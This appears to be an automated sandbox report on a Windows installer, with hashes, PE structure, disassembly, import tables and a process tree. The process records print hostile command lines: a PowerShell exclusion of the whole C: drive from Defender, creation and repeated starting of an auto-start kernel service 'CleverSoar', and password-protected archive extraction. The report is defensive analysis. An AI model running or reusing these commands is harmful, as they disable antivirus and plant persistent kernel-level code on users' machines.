                              • Win16/32 Executable Delphi generic (2074/23) 0.02%
                              File name:#U5b89#U88c5#U52a9#U624b_1.0.8.exe
                              File size:5'707'238 bytes
                              MD5:eb985a9c4c8c2ddc4b039f64b520fca9
                              SHA1:c96d6e0868dd3248261232bd53943abfa074ffce
                              SHA256:830caf16e52e098717a16ce8b2bda28f9a268746be2c77a6098e83941067b31c
                              SHA512:0bf08e1c95a4d0863f67bba18ba43520400972e115f50abe45518fd7246fb0b89c0e8e3302666ae331dde01d765dad44cad01af49b8c60fb77d377599965c5cc
                              SSDEEP:98304:XwREGjGWMsLAe53AKokM1mZDvmruKupjleyr2oEoDqTaMQ1m0idMwZgf:lGjGWMOhRZmiKuzeyyt3PEUs
                              TLSH:88461223F2C7E13EE05E0B3B06B2B15894FB6A506422AE5786ECB4ECCF651501D3E657
                              File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                              Icon Hash:0c0c2d33ceec80aa
                              Entrypoint:0x4a83bc
                              Entrypoint Section:.itext
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                              Time Stamp:0x6690DABD [Fri Jul 12 07:26:53 2024 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:6
                              OS Version Minor:1
                              File Version Major:6
                              File Version Minor:1
                              Subsystem Version Major:6
                              Subsystem Version Minor:1
                              Import Hash:40ab50289f7ef5fae60801f88d4541fc
                              Instruction
                              push ebp
                              mov ebp, esp
                              add esp, FFFFFFA4h
                              push ebx
                              push esi
                              push edi
                              xor eax, eax
                              mov dword ptr [ebp-3Ch], eax
                              mov dword ptr [ebp-40h], eax
                              mov dword ptr [ebp-5Ch], eax
                              mov dword ptr [ebp-30h], eax
                              mov dword ptr [ebp-38h], eax
                              mov dword ptr [ebp-34h], eax
                              mov dword ptr [ebp-2Ch], eax
                              mov dword ptr [ebp-28h], eax
                              mov dword ptr [ebp-14h], eax
                              mov eax, 004A2EBCh
                              call 00007FDB652C4425h
                              xor eax, eax
                              push ebp
                              push 004A8AC1h
                              push dword ptr fs:[eax]
                              mov dword ptr fs:[eax], esp
                              xor edx, edx
                              push ebp
                              push 004A8A7Bh
                              push dword ptr fs:[edx]
                              mov dword ptr fs:[edx], esp
                              mov eax, dword ptr [004B0634h]
                              call 00007FDB65355DABh
                              call 00007FDB653558FEh
                              lea edx, dword ptr [ebp-14h]
                              xor eax, eax
                              call 00007FDB653505D8h
                              mov edx, dword ptr [ebp-14h]
                              mov eax, 004B41F4h
                              call 00007FDB652BE4D3h
                              push 00000002h
                              push 00000000h
                              push 00000001h
                              mov ecx, dword ptr [004B41F4h]
                              mov dl, 01h
                              mov eax, dword ptr [0049CD14h]
                              call 00007FDB65351903h
                              mov dword ptr [004B41F8h], eax
                              xor edx, edx
                              push ebp
                              push 004A8A27h
                              push dword ptr fs:[edx]
                              mov dword ptr fs:[edx], esp
                              call 00007FDB65355E33h
                              mov dword ptr [004B4200h], eax
                              mov eax, dword ptr [004B4200h]
                              cmp dword ptr [eax+0Ch], 01h
                              jne 00007FDB6535CB1Ah
                              mov eax, dword ptr [004B4200h]
                              mov edx, 00000028h
                              call 00007FDB653521F8h
                              mov edx, dword ptr [004B4200h]
                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0xb70000x71.edata
                              IMAGE_DIRECTORY_ENTRY_IMPORT0xb50000xfec.idata
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xcb0000x11000.rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xba0000x10fa8.reloc
                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0xb90000x18.rdata
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0xb52d40x25c.idata
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0xb60000x1a4.didata
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              .text0x10000xa568c0xa5800b889d302f6fc48a904de33d8d947ae80False0.3620185045317221data6.377190161826806IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              .itext0xa70000x1b640x1c00588dd0a8ab499300d3701cbd11b017d9False0.548828125data6.109264411030635IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              .data0xa90000x38380x3a005c0c76e77aef52ebc6702430837ccb6eFalse0.35338092672413796data4.95916338709992IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .bss0xad0000x72580x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .idata0xb50000xfec0x1000627340dff539ef99048969aa4824fb2dFalse0.380615234375data5.020404933181373IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .didata0xb60000x1a40x200fd11c1109737963cc6cb7258063abfd6False0.34765625data2.729290535217263IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .edata0xb70000x710x2007de8ca0c7a61668a728fd3a88dc0942dFalse0.1796875data1.305578535725827IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .tls0xb80000x180x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .rdata0xb90000x5d0x200d84006640084dc9f74a07c2ff9c7d656False0.189453125data1.3892750148744617IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .reloc0xba0000x10fa80x11000a85fda2741bd9417695daa5fc5a9d7a5False0.5789579503676471data6.709466460182023IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                              .rsrc0xcb0000x110000x11000162c4332f4d9aac559be41304700a4ecFalse0.18785903033088236data3.721312151081868IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              NameRVASizeTypeLanguageCountryZLIB Complexity
                              RT_ICON0xcb6780xa68Device independent bitmap graphic, 64 x 128 x 4, image size 2048EnglishUnited States0.1174924924924925
                              RT_ICON0xcc0e00x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.15792682926829268
                              RT_ICON0xcc7480x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.23387096774193547
                              RT_ICON0xcca300x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.39864864864864863
                              RT_ICON0xccb580x1628Device independent bitmap graphic, 64 x 128 x 8, image size 4096, 256 important colorsEnglishUnited States0.08339210155148095
                              RT_ICON0xce1800xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.1023454157782516
                              RT_ICON0xcf0280x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.10649819494584838
                              RT_ICON0xcf8d00x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.10838150289017341
                              RT_ICON0xcfe380x12e5PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.8712011577424024
                              RT_ICON0xd11200x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.05668398677373642
                              RT_ICON0xd53480x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.08475103734439834
                              RT_ICON0xd78f00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.09920262664165103
                              RT_ICON0xd89980x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.2047872340425532
                              RT_STRING0xd8e000x3f8data0.3198818897637795
                              RT_STRING0xd91f80x2dcdata0.36475409836065575
                              RT_STRING0xd94d40x430data0.40578358208955223
                              RT_STRING0xd99040x44cdata0.38636363636363635
                              RT_STRING0xd9d500x2d4data0.39226519337016574
                              RT_STRING0xda0240xb8data0.6467391304347826
                              RT_STRING0xda0dc0x9cdata0.6410256410256411
                              RT_STRING0xda1780x374data0.4230769230769231
                              RT_STRING0xda4ec0x398data0.3358695652173913
                              RT_STRING0xda8840x368data0.3795871559633027
                              RT_STRING0xdabec0x2a4data0.4275147928994083
                              RT_RCDATA0xdae900x10data1.5
                              RT_RCDATA0xdaea00x310data0.6173469387755102
                              RT_RCDATA0xdb1b00x2cdata1.1818181818181819
                              RT_GROUP_ICON0xdb1dc0xbcdataEnglishUnited States0.6170212765957447
                              RT_VERSION0xdb2980x584dataEnglishUnited States0.2804532577903683
                              RT_MANIFEST0xdb81c0x7a8XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3377551020408163
                              DLLImport
                              kernel32.dllGetACP, GetExitCodeProcess, CloseHandle, LocalFree, SizeofResource, VirtualProtect, QueryPerformanceFrequency, VirtualFree, GetFullPathNameW, GetProcessHeap, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVolumeInformationW, GetVersion, GetDriveTypeW, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, LCMapStringW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
                              comctl32.dllInitCommonControls
                              user32.dllCreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
                              oleaut32.dllSysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
                              advapi32.dllConvertStringSecurityDescriptorToSecurityDescriptorW, OpenThreadToken, AdjustTokenPrivileges, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, FreeSid, AllocateAndInitializeSid, EqualSid, RegQueryValueExW, GetTokenInformation, ConvertSidToStringSidW, RegCloseKey
                              NameOrdinalAddress
                              __dbk_fcall_wrapper20x40fc10
                              dbkFCallWrapperAddr10x4b063c
                              Language of compilation systemCountry where language is spokenMap
                              EnglishUnited States
                              No network behavior found

                              Click to jump to process

                              Click to jump to process

                              Click to dive into process behavior distribution

                              Click to jump to process

                              Target ID:0
                              Start time:23:06:06
                              Start date:22/12/2024
                              Path:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exe"
                              Imagebase:0xdb0000
                              File size:5'707'238 bytes
                              MD5 hash:EB985A9C4C8C2DDC4B039F64B520FCA9
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:Borland Delphi
                              Reputation:low
                              Has exited:true

                              Target ID:1
                              Start time:23:06:07
                              Start date:22/12/2024
                              Path:C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\AppData\Local\Temp\is-UDVCT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp" /SL5="$302A6,4752846,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exe"
                              Imagebase:0xd70000
                              File size:3'366'912 bytes
                              MD5 hash:9902FA6D39184B87AED7D94A037912D8
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:Borland Delphi
                              Reputation:low
                              Has exited:true

                              Target ID:2
                              Start time:23:06:07
                              Start date:22/12/2024
                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):false
                              Commandline:"powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
                              Imagebase:0x7ff788560000
                              File size:452'608 bytes
                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:3
                              Start time:23:06:07
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:4
                              Start time:23:06:08
                              Start date:22/12/2024
                              Path:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exe" /VERYSILENT
                              Imagebase:0xdb0000
                              File size:5'707'238 bytes
                              MD5 hash:EB985A9C4C8C2DDC4B039F64B520FCA9
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:Borland Delphi
                              Reputation:low
                              Has exited:false

                              Target ID:5
                              Start time:23:06:08
                              Start date:22/12/2024
                              Path:C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\AppData\Local\Temp\is-VIA1I.tmp\#U5b89#U88c5#U52a9#U624b_1.0.8.tmp" /SL5="$20456,4752846,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.8.exe" /VERYSILENT
                              Imagebase:0xf20000
                              File size:3'366'912 bytes
                              MD5 hash:9902FA6D39184B87AED7D94A037912D8
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:Borland Delphi
                              Reputation:low
                              Has exited:true

                              Target ID:6
                              Start time:23:06:11
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                              Imagebase:0x7ff69b1c0000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:7
                              Start time:23:06:12
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                              Imagebase:0x7ff616510000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:8
                              Start time:23:06:12
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:9
                              Start time:23:06:12
                              Start date:22/12/2024
                              Path:C:\Program Files (x86)\Windows NT\7zr.exe
                              Wow64 process (32bit):true
                              Commandline:7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
                              Imagebase:0xa60000
                              File size:831'200 bytes
                              MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Antivirus matches:
                              • Detection: 0%, ReversingLabs
                              Reputation:low
                              Has exited:true

                              Target ID:10
                              Start time:23:06:12
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:11
                              Start time:23:06:12
                              Start date:22/12/2024
                              Path:C:\Program Files (x86)\Windows NT\7zr.exe
                              Wow64 process (32bit):true
                              Commandline:7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
                              Imagebase:0xa60000
                              File size:831'200 bytes
                              MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:low
                              Has exited:true

                              Target ID:12
                              Start time:23:06:12
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:13
                              Start time:23:06:12
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff69b1c0000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:14
                              Start time:23:06:12
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff616510000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:15
                              Start time:23:06:13
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:16
                              Start time:23:06:13
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff69b1c0000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:17
                              Start time:23:06:13
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff616510000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:18
                              Start time:23:06:13
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:19
                              Start time:23:06:13
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff69b1c0000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:20
                              Start time:23:06:13
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff616510000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:21
                              Start time:23:06:13
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:22
                              Start time:23:06:13
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff69b1c0000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:23
                              Start time:23:06:13
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff616510000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:24
                              Start time:23:06:13
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:25
                              Start time:23:06:13
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff69b1c0000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:26
                              Start time:23:06:13
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff616510000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:27
                              Start time:23:06:13
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:28
                              Start time:23:06:14
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff69b1c0000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:29
                              Start time:23:06:14
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff616510000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:30
                              Start time:23:06:14
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:31
                              Start time:23:06:14
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff69b1c0000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:32
                              Start time:23:06:14
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff616510000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:33
                              Start time:23:06:14
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:34
                              Start time:23:06:14
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff69b1c0000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:35
                              Start time:23:06:14
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff616510000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:36
                              Start time:23:06:14
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
